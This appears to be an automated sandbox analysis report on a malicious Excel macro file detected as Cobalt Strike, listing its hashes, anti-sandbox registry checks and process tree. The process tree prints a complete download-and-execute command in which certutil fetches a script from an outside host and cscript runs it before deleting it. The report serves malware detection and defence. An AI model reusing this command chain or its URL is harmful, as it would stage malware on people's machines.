Analysis
-
max time kernel
115s -
max time network
115s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
04-03-2021 04:52
Static task
static1
Behavioral task
behavioral1
Sample
sbw_jscript.xlsm
Resource
win10v20201028
General
-
Target
sbw_jscript.xlsm
-
Size
12KB
-
MD5
4a0c41bbcf0808d99b6ac38bee9387fa
-
SHA1
f23168b828ce2080432793ca27443ae71c8fa466
-
SHA256
6543e374acbfe9a3bcfa9a76cb743aaea934c1a1fce7c419b42c27b3fbb1f880
-
SHA512
9ec2483860ad39e08a27b8acbc54a1110a424699a6ffbfbd7d752c870f4e980f30bb106f0ab472dc1fc4ed9fbaf2098019ab6249611c9847d0499dfa2e21a81b
Malware Config
Signatures
-
Cobaltstrike
Detected malicious payload which is part of Cobaltstrike.
-
Blocklisted process makes network request 4 IoCs
Processes:
cscript.exeflow pid process 36 580 cscript.exe 38 580 cscript.exe 39 580 cscript.exe 43 580 cscript.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 3928 EXCEL.EXE -
Suspicious use of SetWindowsHookEx 13 IoCs
Processes:
EXCEL.EXEpid process 3928 EXCEL.EXE 3928 EXCEL.EXE 3928 EXCEL.EXE 3928 EXCEL.EXE 3928 EXCEL.EXE 3928 EXCEL.EXE 3928 EXCEL.EXE 3928 EXCEL.EXE 3928 EXCEL.EXE 3928 EXCEL.EXE 3928 EXCEL.EXE 3928 EXCEL.EXE 3928 EXCEL.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
cmd.exedescription pid process target process PID 1764 wrote to memory of 2344 1764 cmd.exe certutil.exe PID 1764 wrote to memory of 2344 1764 cmd.exe certutil.exe PID 1764 wrote to memory of 580 1764 cmd.exe cscript.exe PID 1764 wrote to memory of 580 1764 cmd.exe cscript.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\sbw_jscript.xlsm"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {c08afd90-f2a1-11d1-8455-00a0c91f3880} -Embedding1⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {3eef301f-b596-4c0b-bd92-013beafce793} -Embedding1⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c certutil -urlcache -split -f https://docs.healthmade.org//tc.js "%USERPROFILE%\\Documents\\tc.js" && cscript "%USERPROFILE%\\Documents\\tc.js" && del "%USERPROFILE%\\Documents\\tc.js"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\certutil.execertutil -urlcache -split -f https://docs.healthmade.org//tc.js "C:\Users\Admin\\Documents\\tc.js"2⤵
-
C:\Windows\System32\cscript.execscript "C:\Users\Admin\\Documents\\tc.js"2⤵
- Blocklisted process makes network request
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\Documents\tc.jsMD5
5dd84ed24e14474850b4760861347b6a
SHA1415dffb5d0780773c69a53109a4cea1b0209f5d2
SHA2566faa1ef6526e81680ba03b4a0d6b351ebb11f61cbe230fea0202839974cae6df
SHA5125355b4b191747e8fe9cf7f2bac7c1a990c3e7b0a79dff3b7db01ee754d00cb0de95b17f0ddf0b48e0f3fb6b0243ab633826e9653aaa686669b2d6ec97780e8ab
-
memory/580-8-0x0000000000000000-mapping.dmp
-
memory/580-10-0x00007FF8E0000000-0x00007FF8E09A0000-memory.dmpFilesize
9.6MB
-
memory/580-11-0x000001B9CD730000-0x000001B9CD732000-memory.dmpFilesize
8KB
-
memory/580-12-0x000001B9CD738000-0x000001B9CD73A000-memory.dmpFilesize
8KB
-
memory/580-13-0x000001B9CD740000-0x000001B9CD780000-memory.dmpFilesize
256KB
-
memory/2344-7-0x0000000000000000-mapping.dmp
-
memory/3928-2-0x00007FF8C5770000-0x00007FF8C5780000-memory.dmpFilesize
64KB
-
memory/3928-3-0x00007FF8C5770000-0x00007FF8C5780000-memory.dmpFilesize
64KB
-
memory/3928-4-0x00007FF8C5770000-0x00007FF8C5780000-memory.dmpFilesize
64KB
-
memory/3928-5-0x00007FF8C5770000-0x00007FF8C5780000-memory.dmpFilesize
64KB
-
memory/3928-6-0x00007FF8E8EC0000-0x00007FF8E94F7000-memory.dmpFilesize
6.2MB